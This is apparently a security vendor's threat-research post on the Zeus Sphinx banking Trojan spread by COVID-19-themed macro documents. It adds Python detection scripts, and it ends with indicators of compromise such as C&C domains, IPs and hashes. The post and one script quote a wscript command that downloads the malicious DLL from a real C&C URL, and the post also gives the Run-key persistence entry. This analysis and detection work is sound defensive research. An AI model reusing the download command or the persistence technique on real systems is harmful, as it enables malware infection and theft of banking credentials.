The past few months have created a new reality around the world as the novel coronavirus pandemic has spread from country to country, raising concerns everywhere. With spammers and malware distributors already accustomed to riding new trends, the COVID-19 theme has been exploited to the full by a wide variety of spam and malspam campaigns. It seemed like the right time for Zeus Sphinx (AKA Zloader, Terdot) to join the crowd and resurface after nearly three years of absence.
While some of the Sphinx activity we detected dates back to December 2019, the volume of campaigns only increased in March 2020, likely after a testing period by the Sphinx operators. Taking advantage of the current climate, Sphinx operators are targeting those awaiting government relief payments. Current malspam campaigns include booby-trapped document files named “COVID 19 relief” and subject lines on the same theme. Sphinx’s targets have not changed from those in its old configuration files: it continues to focus on banks in the United States, Canada and Australia.
While the renewed Zeus Sphinx activity that IBM X-Force sees involves a somewhat modified variant, Zeus Sphinx is not new malware and this variant differs only slightly from the original. We therefore go over the basic modifications made to the variant we observed, mainly affecting its delivery and deployment on newly infected devices, as well as its focus on the current pandemic.
COVID-19 Maldoc Spam Delivery
Nowadays, almost all malware campaigns use malicious document files (maldocs) to reach the mailboxes of potential victims. The Sphinx campaigns we observed are likewise disseminated via maldoc spam that rides the COVID-19 theme. Over the past three months, spammers around the world have used the pandemic to spread phishing, scams and malware. In the case of Sphinx, the email tells victims they must fill out an attached form to receive monetary compensation for having to stay at home to curb rising infection rates.
Figure 1: Malspam delivering a Zeus Sphinx infection (Source: IBM X-Force)
Delivered as a variety of Office file types, mostly .doc or .docx, these documents first ask the end user to enable macros, which unknowingly triggers the first step of the infection chain. Once the end user enables the malicious macros, the script starts its deployment, typically abusing legitimate Windows processes to retrieve a malware downloader. The downloader then communicates with a remote command and control (C&C) server and retrieves the payload: in this case, the new Sphinx variant.
The maldoc is password protected, which can prevent the file from being analyzed (for example, by an email gateway or sandbox) before the recipient opens it.
Figure 2: Maldoc file requires password to open (Source: IBM X-Force)
In the next step, the recipient is asked to enable macros.
Figure 3: The booby-trapped maldoc asks the user to enable macros (Source: IBM X-Force)
Once on the device, Sphinx establishes persistence via commonly used methods to maintain control of the end user’s machine. In this case, it writes numerous folders and files to disk and adds registry keys in order to hide and manage its configuration over time.
Deployment method
The infection process of the new Zeus Sphinx variant starts with the weaponized document, which creates a malicious folder under %SYSTEMDRIVE% and writes a batch file to it.
When the batch file runs, it writes a VBS file to the same folder. This file is executed via the legitimate WScript.exe host, establishes a communication channel with the C&C server and downloads the malicious executable as a DLL.
Figure 4: Sphinx scripts and unwanted text inserted in the file (Source: IBM X-Force)
The command line is similar across cases. As written in the VBS file, here is an example of the command:
“//Nologo C:\Logs\Jobs.vbs http://brinchil.xyz/MLrPSC C:\Logs\kofet.dll“
The malicious DLL, which is the Sphinx executable, is also written to the folder under %SYSTEMDRIVE%. The infection proper is started by executing the Sphinx DLL with Regsvr32.exe, which triggers the Sphinx infection chain.
First, the malware spawns msiexec.exe as a hollowed process and injects its code into it, the same process hollowing step used by older versions of Sphinx for deployment. It creates a first folder under %APPDATA% and drops an executable file there; later, it changes the file’s extension to .DLL for persistence purposes.
In addition, the malware drops more than 10 other malicious files containing various data under %APPDATA%.
Figure 5: Sphinx files written under %APPDATA% (Source: IBM X-Force)
Next, the malware creates a Run entry in the registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run pointing to the DLL under %APPDATA% as its persistence method. The entry invokes Rundll32.exe with DllRegisterServer as the entry point, which calls the same DllRegisterServer export that Regsvr32.exe would, so the DLL is executed at every logon.
For example:
- Key – HKCU\Software\Microsoft\Windows\CurrentVersion\Run, value name Uffuehh
- Data – rundll32.exe C:\Users\michel\AppData\Roaming\Fecaa\dagicoy.dll,DllRegisterServer
Figure 6: Zeus Sphinx execution key (Source: IBM X-Force)
The malware also stores part of its configuration in two registry keys under HKCU\Software\Microsoft (detailed in the “Configuring malware” section below).
Note that all file and resource names are dynamically generated per infected machine and not hard-coded; the names shown in this blog are therefore examples that will differ across deployments.
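To turn the deployment steps above into something a defender can run, here is an added example (not IBM X-Force code) that triages process-creation events for the four stages described: an Office process spawning a script host, WScript running a .vbs from a shallow %SYSTEMDRIVE% folder with a URL and a .dll destination on its command line, Regsvr32 executing a DLL from that folder, and Rundll32 calling DllRegisterServer on a DLL under %APPDATA%. The event records, their field names (image, parent_image, command_line) and the batch file name stage.bat are constructed for the example; the paths reuse those quoted in the text.

```python
"""Triage process-creation events for the Zeus Sphinx delivery chain.

Added example, not IBM X-Force code. The event records, their field names
(image, parent_image, command_line) and the batch file name are constructed
for this example; map the fields to your own Sysmon/EDR schema.
"""
import re
from typing import Dict, List

OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Path-like tokens on a command line; stops at whitespace, quotes and the comma
# rundll32 uses to separate the DLL path from its entry point.
PATH_RE = re.compile(r"[a-z]:\\[^\s\",]+", re.IGNORECASE)
# A file one folder below the drive root, e.g. C:\Logs\Jobs.vbs: the shallow
# %SYSTEMDRIVE% staging folder the text describes.
SHALLOW_SYSDRIVE_RE = re.compile(r"^[a-z]:\\[^\\]+\\[^\\]+$", re.IGNORECASE)
APPDATA_ROAMING_RE = re.compile(r"\\AppData\\Roaming\\", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage_event(ev: Dict[str, str]) -> List[str]:
    """Return the chain stages (tags) that one process-creation event matches."""
    image = _basename(ev.get("image", ""))
    parent = _basename(ev.get("parent_image", ""))
    cmd = ev.get("command_line", "")
    paths = PATH_RE.findall(cmd)
    findings: List[str] = []

    # Stage 1: the macro in the maldoc spawns a shell or script host.
    if parent in OFFICE_HOSTS and image in SCRIPT_HOSTS:
        findings.append("office-spawned-script-host")

    # Stage 2: WScript runs a .vbs from a shallow system-drive folder and is
    # handed both a URL and a .dll destination (the downloader stage).
    if image in {"wscript.exe", "cscript.exe"} and URL_RE.search(cmd):
        has_vbs = any(p.lower().endswith(".vbs") and SHALLOW_SYSDRIVE_RE.match(p) for p in paths)
        has_dll = any(p.lower().endswith(".dll") for p in paths)
        if has_vbs and has_dll:
            findings.append("wscript-url-to-dll-downloader")

    # Stage 3: Regsvr32 registers (executes) a DLL from that same shallow folder.
    if image == "regsvr32.exe" and any(
        p.lower().endswith(".dll") and SHALLOW_SYSDRIVE_RE.match(p) for p in paths
    ):
        findings.append("regsvr32-sysdrive-dll")

    # Stage 4: Run-key persistence: rundll32 calling DllRegisterServer on a DLL
    # under %APPDATA% (AppData\Roaming).
    if image == "rundll32.exe" and "dllregisterserver" in cmd.lower() and any(
        APPDATA_ROAMING_RE.search(p) for p in paths
    ):
        findings.append("rundll32-appdata-dllregisterserver")

    return findings


def check_run_value(data: str) -> bool:
    """True if the data of a Run value looks like the Sphinx persistence entry."""
    exe = data.strip().split(" ", 1)[0].strip('"')
    return "rundll32-appdata-dllregisterserver" in triage_event(
        {"image": exe, "command_line": data}
    )


def triage_events(events: List[Dict[str, str]]) -> List[List[str]]:
    return [triage_event(ev) for ev in events]


# Constructed sample events, reusing the paths quoted in the text.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c C:\Logs\stage.bat"},  # batch file name is made up
    {"parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r"wscript.exe //Nologo C:\Logs\Jobs.vbs http://brinchil.xyz/MLrPSC C:\Logs\kofet.dll"},
    {"parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": r"regsvr32.exe C:\Logs\kofet.dll"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe C:\Users\michel\AppData\Roaming\Fecaa\dagicoy.dll,DllRegisterServer"},
    {"parent_image": r"C:\Windows\explorer.exe",  # benign rundll32 use: no findings
     "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for ev, tags in zip(SAMPLE_EVENTS, triage_events(SAMPLE_EVENTS)):
        print(f"{_basename(ev['image']):<14} {tags}")
```

Sysmon Event ID 1 exposes Image, ParentImage and CommandLine directly; other EDRs use different field names. The shallow-folder heuristic will also fire on legitimate tooling staged in directories such as C:\Tools, so treat the tags as hunting leads to be correlated (several stages on one host within minutes) rather than as standalone alerts.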
Self-signed certificate
Sphinx signs its malicious code with a self-signed digital certificate. Such a signature does not chain to a trusted root and so proves nothing about the publisher, but the mere presence of a signature can help the code stay under the radar of common antivirus (AV) tools when injected into browser processes. In the following example, this file is named “Byfehi.”
Figure 7: Sphinx self-signed certificate (Source: IBM X-Force)
Zeus Live Web Injections
Some of Zeus Sphinx’s traits, inherited from its Zeus v2 code base, remain intact. Several Zeus variants work the same way, writing their resources to the %APPDATA% folder and their registry keys under HKCU\Software\Microsoft.
To perform web injections, the malware patches explorer.exe and the browser processes iexplore.exe, chrome.exe and firefox.exe, but it lacks the ability to re-apply the patch once it is undone, which makes the hooking less persistent and unlikely to survive browser version upgrades.
Sphinx also creates a mutex in the injected process whose name has a GUID-like form: [0-9A-F]{12}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{8}. Note the 12-4-4-4-8 grouping, which is the reverse of a standard GUID’s 8-4-4-4-12 layout and therefore distinguishes these mutexes from GUID-named mutexes created by legitimate software.
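As an added example (not from the original post), the following classifier checks mutex names against the layout just quoted and separates them from ordinary GUID-named mutexes. The object-namespace prefixes it strips and the sample names are constructed.

```python
"""Classify mutex names against the Sphinx GUID-like layout quoted above.

Added example, not IBM X-Force code. The sample names below are constructed.
"""
import re
from typing import List

# Layout as given in the text: 12-4-4-4-8 uppercase hex groups. A standard GUID
# is 8-4-4-4-12, so Sphinx's name is a GUID with its outer groups swapped.
SPHINX_MUTEX_RE = re.compile(
    r"^[0-9A-F]{12}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{8}$"
)
# A conventional GUID, with or without braces, in either case.
STANDARD_GUID_RE = re.compile(
    r"^\{?[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}\}?$"
)
# Object-namespace prefixes that handle listings (e.g. Sysinternals Handle,
# memory forensics tools) put in front of a named object.
NAMESPACE_PREFIX_RE = re.compile(
    r"^(\\Sessions\\\d+\\BaseNamedObjects\\|\\BaseNamedObjects\\|Global\\|Local\\)",
    re.IGNORECASE,
)


def normalize_mutex_name(name: str) -> str:
    """Strip the namespace prefix so only the object name itself is matched."""
    return NAMESPACE_PREFIX_RE.sub("", name.strip())


def classify_mutex(name: str) -> str:
    """Return 'sphinx-like', 'standard-guid' or 'other' for one mutex name."""
    n = normalize_mutex_name(name)
    if SPHINX_MUTEX_RE.match(n):
        return "sphinx-like"
    if STANDARD_GUID_RE.match(n):
        return "standard-guid"
    return "other"


def hunt_mutexes(names: List[str]) -> List[str]:
    """Return the mutex names (as given) that match the Sphinx layout."""
    return [n for n in names if classify_mutex(n) == "sphinx-like"]


# Constructed sample names: one in the Sphinx layout, one ordinary GUID, one in
# the Sphinx layout but lowercase (not the documented form), one plain name.
SAMPLE_MUTEXES = [
    r"\Sessions\1\BaseNamedObjects\0123456789AB-CDEF-0123-4567-89ABCDEF",
    r"\BaseNamedObjects\{01234567-89AB-CDEF-0123-456789ABCDEF}",
    "0123456789ab-cdef-0123-4567-89abcdef",
    "Local\\ZonesCounterMutex",
]

if __name__ == "__main__":
    for name in SAMPLE_MUTEXES:
        print(f"{classify_mutex(name):<14} {name}")
```

The pattern is taken literally from the text (uppercase hex only), so a lowercase name in the same layout is reported as "other"; relax the character class if your own samples show otherwise.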
Configuring malware
The Sphinx variant we looked at stores its configuration in two registry keys under HKCU\Software\Microsoft, each holding part of the configuration.
In the example below, these are HKCU\Software\Microsoft\Ehobb and HKCU\Software\Microsoft\olyq.
Figure 8: Sphinx configuration file (Source: IBM X-Force)
Current targets
Once the configuration is loaded and extracted from Sphinx’s process memory, it shows that Sphinx is back to targeting major banks in the United States and Canada. We are also seeing rising infection rates in Australia, targeting major banks in that region.
Fetching Injections From “Tables” – A Commercial Web Injection Panel
The currently active Zeus Sphinx variant fetches its web injections from a web-based control panel known as “Tables”, which it reaches through its C&C infrastructure.
Figure 9: “Tables” web interface – user login page (Source: IBM X-Force)
The Tables web injection system has been operational since 2014 and is mainly used by Zeus-type Trojans that target entities in North America and Europe.
The panel provides the resources the malware needs to manipulate banking sessions and collect relevant information from infected victims’ machines. Once the connection to the Tables panel is established, Sphinx retrieves additional JavaScript files for its web injections, tailored to the targeted bank the user is browsing. The injections are all served from the same domain, with a specific JS script for each bank/target.
About Zeus Sphinx
Zeus Sphinx initially emerged as a commercial banking Trojan that was first sold and spread in August 2015, targeting major financial entities in the UK. Over time it expanded its reach to banks in Australia, Brazil and North America. Attackers deploying Sphinx remain focused on the banking industry in these countries, adapting their attacks to local financial systems.
As a modular banking Trojan based on the dated Zeus v2 code, Sphinx’s primary capability is to collect online account credentials for banks and a wide range of other websites. It calls its C&C server to retrieve the relevant web injections when infected users land on a targeted page and uses them to modify the pages users see, adding social engineering content that induces them to disclose personal information and authentication codes.
Want to keep up to date with the Sphinx and new threat information? Join us on the IBM X-Force Exchange and read our Security Intelligence research blogs.
Indicators of Compromise (IoCs)
Maldoc
DFF2E1A0B80C26D413E9D4F96031019CE4567607E0231A80D0EE0EB1FCF429FE
Samples
VBS sample: 2FC871107D46FA5AA8095B78D5ABAB78
Sphinx samples:
C8DFF758FEB96878F578ADF66B654CD7
70E58943AC83F5D6467E5E173EC66B28
7CA44F6F8030DF33ADA36EB35649BE71
8A96E96113FB9DC47C286263289BD667
C6D279AC30D0A60D22C4981037580939
IPs
104.27.179.176
104.27.178.176
185.14.29.227
49.51.161.225
47.254.174.129
C&C Servers
Downloader C&C: hxxp://brinchil[.]xyz
Sphinx C&C:
hxxps://seobrooke[.]com
hxxps://securitysystemswap[.]com
hxxps://axelerode[.]club